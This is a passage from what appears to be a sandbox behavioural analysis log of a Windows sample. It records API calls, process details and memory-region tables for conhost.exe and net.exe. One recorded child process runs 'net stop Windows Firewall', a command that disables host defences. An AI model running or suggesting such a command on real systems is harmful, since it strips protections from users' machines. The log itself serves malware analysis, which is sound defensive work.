RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xa9c) returned 0x54c728 [0296.054] FreeEnvironmentStringsA (penv="=") returned 1 [0296.055] GetProcessHeap () returned 0x540000 [0296.055] RtlFreeHeap (HeapHandle=0x540000, Flags=0x0, BaseAddress=0x54b0b8) returned 1 [0296.055] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0296.055] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.055] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0296.055] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.055] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0296.056] _get_osfhandle (_FileHandle=0) returned 0x38 [0296.056] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0296.056] SetConsoleInputExeNameW () returned 0x1 [0296.056] GetConsoleOutputCP () returned 0x1b5 [0296.057] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0296.057] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.057] exit (_Code=1) Thread: id = 208 os_tid = 0x12e4 Process: id = "35" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x72d6e000" os_pid = "0x39c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0xc30" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2881 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2882 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2883 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2884 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2885 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2886 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2887 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2888 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2889 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2890 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2891 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2892 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2893 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2894 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2895 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2896 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2897 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2898 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2899 start_va = 0x790000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 2900 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2901 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2902 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2903 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2904 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2905 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2906 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2907 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2908 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2909 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2910 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2911 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2912 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2913 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2914 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2915 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2916 start_va = 0x920000 end_va = 0xaa7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 2917 start_va = 0xab0000 end_va = 0xc30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 2918 start_va = 0xc40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 2919 start_va = 0x790000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 2920 start_va = 0x910000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 2921 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2922 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2923 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2924 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2925 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2926 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2927 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2928 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2929 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2930 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2931 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2932 start_va = 0x2040000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2934 start_va = 0x2200000 end_va = 0x2536fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2935 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2936 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2937 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 2938 start_va = 0x790000 end_va = 0x7e9fff monitored = 1 entry_point = 0x7a53f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 2939 start_va = 0x890000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 2940 start_va = 0x2540000 end_va = 0x275afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 2941 start_va = 0x2760000 end_va = 0x2971fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 2942 start_va = 0x2040000 end_va = 0x2151fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2943 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 2944 start_va = 0x2980000 end_va = 0x2b91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 2945 start_va = 0x2ba0000 end_va = 0x2ca8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 2946 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2947 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2948 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2949 start_va = 0x790000 end_va = 0x84bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 2950 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2951 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2952 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2953 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2954 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 2955 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2956 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2957 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2958 start_va = 0x680000 end_va = 0x680fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 2959 start_va = 0x850000 end_va = 0x851fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 2960 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 2961 start_va = 0x860000 end_va = 0x860fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2962 start_va = 0x870000 end_va = 0x871fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Thread: id = 204 os_tid = 0x698 Thread: id = 205 os_tid = 0x1004 Thread: id = 206 os_tid = 0xf3c Thread: id = 207 os_tid = 0xf28 Process: id = "36" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x61fb6000" os_pid = "0xe60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0xc30" cmd_line = "net stop Windows Firewall" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2971 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2972 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2973 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2974 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2975 start_va = 0xa0000 end_va = 0x11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2976 start_va = 0x120000 end_va = 0x123fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 2977 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 2978 start_va = 0x140000 end_va = 0x141fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 2979 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2980 start_va = 0xe80000 end_va = 0xe99fff monitored = 0 entry_point = 0xe831e0 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 2981 start_va = 0xea0000 end_va = 0x4e9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 2982 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2983 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2984 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2985 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2986 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 2987 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2988 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 2990 start_va = 0x180000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2991 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2992 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2993 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2994 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2995 start_va = 0x400000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2996 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2997 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2998 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2999 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3000 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3001 start_va = 0x520000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3002 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3003 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3004 start_va = 0x620000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3005 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3006 start_va = 0x6ab50000 end_va = 0x6ab65fff monitored = 0 entry_point = 0x6ab521d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3007 start_va = 0x6a930000 end_va = 0x6a93ffff monitored = 0 entry_point = 0x6a9334d0 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 3008 start_va = 0x6a910000 end_va = 0x6a924fff monitored = 0 entry_point = 0x6a915210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 3009 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3010 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3011 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3012 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3013 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3014 start_va = 0x6a900000 end_va = 0x6a909fff monitored = 0 entry_point = 0x6a9028d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3015 start_va = 0x6a8e0000 end_va = 0x6a8fbfff monitored = 0 entry_point = 0x6a8e4720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3016 start_va = 0x73d10000 end_va = 0x73d3efff monitored = 0 entry_point = 0x73d1bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3017 start_va = 0x74560000 end_va = 0x7457afff monitored = 0 entry_point = 0x74569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: 